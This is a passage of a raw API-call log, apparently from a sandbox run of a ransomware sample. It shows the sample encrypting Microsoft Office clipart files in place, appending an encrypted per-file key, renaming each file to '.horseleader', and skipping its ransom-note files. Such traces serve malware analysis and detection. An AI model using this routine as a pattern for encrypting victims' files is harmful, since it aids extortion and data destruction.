pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.176] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd06200_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.178] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF") returned 67 [0253.178] StrStrW (lpFirst="BD06200_.WMF", lpSrch=".txt") returned 0x0 [0253.178] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=16676) returned 1 [0253.178] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x4124, lpOverlapped=0x0) returned 1 [0253.180] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffbedc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.180] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x4124, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x4124, lpOverlapped=0x0) returned 1 [0253.180] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.181] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.181] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.181] CloseHandle (hObject=0x158) returned 1 [0253.181] GetProcessHeap () returned 0x780000 [0253.181] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.181] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF.horseleader") returned 79 
[0253.181] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd06200_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd06200_.wmf.horseleader")) returned 1 [0253.182] GetProcessHeap () returned 0x780000 [0253.182] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.182] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5f455930, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x687c, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BD07761_.WMF", cAlternateFileName="")) returned 1 [0253.182] lstrcmpiW (lpString1="BD07761_.WMF", lpString2="Windows") returned -1 [0253.182] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF") returned 67 [0253.182] StrStrIW (lpFirst="BD07761_.WMF", lpSrch=".horseleader") returned 0x0 [0253.183] lstrcmpW (lpString1="BD07761_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.183] lstrcmpW (lpString1="BD07761_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.183] lstrlenW (lpString=".testttjffg") returned 11 [0253.183] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.183] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.183] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, 
dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.183] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07761_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.183] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF") returned 67 [0253.183] StrStrW (lpFirst="BD07761_.WMF", lpSrch=".txt") returned 0x0 [0253.184] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=26748) returned 1 [0253.184] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.187] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.187] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.187] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x187c, lpOverlapped=0x0) returned 1 [0253.187] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe784, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.187] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x187c, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: 
lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x187c, lpOverlapped=0x0) returned 1 [0253.187] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.188] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.188] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.188] CloseHandle (hObject=0x158) returned 1 [0253.188] GetProcessHeap () returned 0x780000 [0253.188] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.188] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF.horseleader") returned 79 [0253.188] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07761_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07761_.wmf.horseleader")) returned 1 [0253.189] GetProcessHeap () returned 0x780000 [0253.189] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.189] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5f455930, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, 
ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x133c, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BD07804_.WMF", cAlternateFileName="")) returned 1 [0253.189] lstrcmpiW (lpString1="BD07804_.WMF", lpString2="Windows") returned -1 [0253.189] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 67 [0253.189] StrStrIW (lpFirst="BD07804_.WMF", lpSrch=".horseleader") returned 0x0 [0253.189] lstrcmpW (lpString1="BD07804_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.189] lstrcmpW (lpString1="BD07804_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.189] lstrlenW (lpString=".testttjffg") returned 11 [0253.190] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.190] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.190] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.190] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07804_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.190] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 67 [0253.190] StrStrW (lpFirst="BD07804_.WMF", lpSrch=".txt") returned 0x0 [0253.190] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=4924) returned 1 [0253.191] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, 
lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x133c, lpOverlapped=0x0) returned 1 [0253.193] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffecc4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.193] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x133c, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x133c, lpOverlapped=0x0) returned 1 [0253.193] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.193] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.193] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.193] CloseHandle (hObject=0x158) returned 1 [0253.194] GetProcessHeap () returned 0x780000 [0253.194] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.194] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF.horseleader") returned 79 [0253.194] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07804_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07804_.wmf.horseleader")) returned 1 [0253.195] GetProcessHeap () 
returned 0x780000 [0253.195] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.195] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5f455930, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xfe2, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BD07831_.WMF", cAlternateFileName="")) returned 1 [0253.195] lstrcmpiW (lpString1="BD07831_.WMF", lpString2="Windows") returned -1 [0253.195] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF") returned 67 [0253.195] StrStrIW (lpFirst="BD07831_.WMF", lpSrch=".horseleader") returned 0x0 [0253.195] lstrcmpW (lpString1="BD07831_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.195] lstrcmpW (lpString1="BD07831_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.195] lstrlenW (lpString=".testttjffg") returned 11 [0253.195] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.195] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.195] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.196] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07831_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.197] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF") returned 67 [0253.197] StrStrW (lpFirst="BD07831_.WMF", lpSrch=".txt") returned 0x0 [0253.197] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=4066) returned 1 [0253.197] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xfe2, lpOverlapped=0x0) returned 1 [0253.199] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff01e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.199] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xfe2, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xfe2, lpOverlapped=0x0) returned 1 [0253.200] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.200] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.200] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.200] CloseHandle (hObject=0x158) returned 1 [0253.200] GetProcessHeap () returned 0x780000 [0253.200] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.200] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF.horseleader") returned 79 
[0253.200] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07831_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07831_.wmf.horseleader")) returned 1 [0253.201] GetProcessHeap () returned 0x780000 [0253.201] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.201] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5178e0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x5f00, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BD08758_.WMF", cAlternateFileName="")) returned 1 [0253.201] lstrcmpiW (lpString1="BD08758_.WMF", lpString2="Windows") returned -1 [0253.202] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 67 [0253.202] StrStrIW (lpFirst="BD08758_.WMF", lpSrch=".horseleader") returned 0x0 [0253.202] lstrcmpW (lpString1="BD08758_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.202] lstrcmpW (lpString1="BD08758_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.202] lstrlenW (lpString=".testttjffg") returned 11 [0253.202] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.202] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.202] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, 
dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.202] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08758_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.203] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 67 [0253.203] StrStrW (lpFirst="BD08758_.WMF", lpSrch=".txt") returned 0x0 [0253.203] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=24320) returned 1 [0253.203] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.207] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.207] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.207] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xf00, lpOverlapped=0x0) returned 1 [0253.207] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff100, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.208] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xf00, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: 
lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xf00, lpOverlapped=0x0) returned 1 [0253.208] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.208] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.208] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.208] CloseHandle (hObject=0x158) returned 1 [0253.208] GetProcessHeap () returned 0x780000 [0253.208] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.208] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF.horseleader") returned 79 [0253.208] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08758_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08758_.wmf.horseleader")) returned 1 [0253.209] GetProcessHeap () returned 0x780000 [0253.209] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.209] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5f455930, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, 
ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x60ca, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BD08773_.WMF", cAlternateFileName="")) returned 1 [0253.210] lstrcmpiW (lpString1="BD08773_.WMF", lpString2="Windows") returned -1 [0253.210] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF") returned 67 [0253.210] StrStrIW (lpFirst="BD08773_.WMF", lpSrch=".horseleader") returned 0x0 [0253.210] lstrcmpW (lpString1="BD08773_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.210] lstrcmpW (lpString1="BD08773_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.210] lstrlenW (lpString=".testttjffg") returned 11 [0253.210] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.210] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.210] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.210] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08773_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.211] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF") returned 67 [0253.211] StrStrW (lpFirst="BD08773_.WMF", lpSrch=".txt") returned 0x0 [0253.211] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=24778) returned 1 [0253.211] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, 
